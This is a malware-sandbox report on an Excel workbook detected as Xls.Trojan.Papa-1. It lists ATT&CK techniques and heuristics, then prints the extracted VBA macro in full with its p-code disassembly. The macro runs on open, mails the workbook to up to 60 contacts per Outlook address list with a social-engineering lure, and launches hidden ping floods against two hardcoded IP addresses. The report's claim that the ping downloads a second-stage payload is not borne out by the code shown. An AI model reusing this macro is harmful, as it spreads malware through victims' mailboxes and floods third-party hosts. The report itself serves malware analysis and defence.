MALICIOUS
320
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1041 Exfiltration Over C2 Link
T1566.001 Spearphishing Attachment
T1071.001 Web Protocols
The sample contains a Workbook_Open macro that uses CreateObject to interact with Outlook, sending copies of the workbook to the victim's contacts. It also uses the Shell() function to execute a ping command, which likely serves to download and execute a second-stage payload from one of the hardcoded IP addresses. The macro's intent is to spread itself and download further malicious content.
Heuristics 6
-
ClamAV: Xls.Trojan.Papa-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Papa-1
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4469 bytes |
SHA-256: e5131945628f13103b106973c21dbcc475e2fc3b2d82da4b3e70f0b4371b10f2 |
|||
|
Detection
ClamAV:
Xls.Trojan.Papa-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
On Error Resume Next
Application.EnableCancelKey = 0
Randomize
Set oa = CreateObject("Outlook.Application")
Set mn = oa.GetNameSpace("MAPI")
If oa = "Outlook" Then
mn.Logon "profile", "password"
For y = 1 To mn.AddressLists.Count
x = 1
Set ab = mn.AddressLists(y)
Set papaver = oa.CreateItem(0)
For z = 1 To ab.AddressEntries.Count
vi = ab.AddressEntries(x)
papaver.Recipients.Add vi
x = x + 1
If x > 60 Then z = ab.AddressEntries.Count
Next z
papaver.Subject = "Fwd: Workbook from all.net and Fred Cohen"
papaver.Body = "Urgent info inside. Disregard macro warning."
papaver.Attachments.Add ActiveWorkbook.FullName
papaver.Send
vi = ""
Next y
mn.Logoff
q = Int(6 * Rnd)
If q = 2 Then
Shell "ping -t -l" & Str(Int(60000 * Rnd)) & " -w 1 207.222.214.225", vbHide
ElseIf q = 4 Then
Shell "ping -t -l" & Str(Int(60000 * Rnd)) & " -w 1 24.1.84.100", vbHide
End If
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /opt/analyzer/scan_staging/2570a02638fb43cba9d15893eeafe231.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 2885 bytes
' Line #0:
' FuncDefn (Private Sub Workbook_Open())
' Line #1:
' OnError (Resume Next)
' Line #2:
' LitDI2 0x0000
' Ld Application
' MemSt EnableCancelKey
' Line #3:
' ArgsCall Read 0x0000
' Line #4:
' SetStmt
' LitStr 0x0013 "Outlook.Application"
' ArgsLd CreateObject 0x0001
' Set oa
' Line #5:
' SetStmt
' LitStr 0x0004 "MAPI"
' Ld oa
' ArgsMemLd GetNameSpace 0x0001
' Set mn
' Line #6:
' Ld oa
' LitStr 0x0007 "Outlook"
' Eq
' IfBlock
' Line #7:
' LitStr 0x0007 "profile"
' LitStr 0x0008 "password"
' Ld mn
' ArgsMemCall Logon 0x0002
' Line #8:
' StartForVariable
' Ld y
' EndForVariable
' LitDI2 0x0001
' Ld mn
' MemLd AddressLists
' MemLd Count
' For
' Line #9:
' LitDI2 0x0001
' St x
' Line #10:
' SetStmt
' Ld y
' Ld mn
' ArgsMemLd AddressLists 0x0001
' Set ab
' Line #11:
' SetStmt
' LitDI2 0x0000
' Ld oa
' ArgsMemLd CreateItem 0x0001
' Set papaver
' Line #12:
' StartForVariable
' Ld z
' EndForVariable
' LitDI2 0x0001
' Ld ab
' MemLd AddressEntries
' MemLd Count
' For
' Line #13:
' Ld x
' Ld ab
' ArgsMemLd AddressEntries 0x0001
' St vi
' Line #14:
' Ld vi
' Ld papaver
' MemLd Recipients
' ArgsMemCall Add 0x0001
' Line #15:
' Ld x
' LitDI2 0x0001
' Add
' St x
' Line #16:
' Ld x
' LitDI2 0x003C
' Gt
' If
' BoSImplicit
' Ld ab
' MemLd AddressEntries
' MemLd Count
' St z
' EndIf
' Line #17:
' StartForVariable
' Ld z
' EndForVariable
' NextVar
' Line #18:
' LitStr 0x0029 "Fwd: Workbook from all.net and Fred Cohen"
' Ld papaver
' MemSt Subject
' Line #19:
' LitStr 0x002D "Urgent info inside. Disregard macro warning."
' Ld papaver
' MemSt Body
' Line #20:
' Ld ActiveWorkbook
' MemLd FullName
' Ld papaver
' MemLd Attachments
' ArgsMemCall Add 0x0001
' Line #21:
' Ld papaver
' ArgsMemCall Send 0x0000
' Line #22:
' LitStr 0x0000 ""
' St vi
' Line #23:
' StartForVariable
' Ld y
' EndForVariable
' NextVar
' Line #24:
' Ld mn
' ArgsMemCall Logoff 0x0000
' Line #25:
' LitDI2 0x0006
' Ld Rnd
' Mul
' FnInt
' St q
' Line #26:
' Ld q
' LitDI2 0x0002
' Eq
' IfBlock
' Line #27:
' LitStr 0x000A "ping -t -l"
' LitDI4 0xEA60 0x0000
' Ld Rnd
' Mul
' FnInt
' ArgsLd Str 0x0001
' Concat
' LitStr 0x0015 " -w 1 207.222.214.225"
' Concat
' Ld vbHide
' ArgsCall Shell 0x0002
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.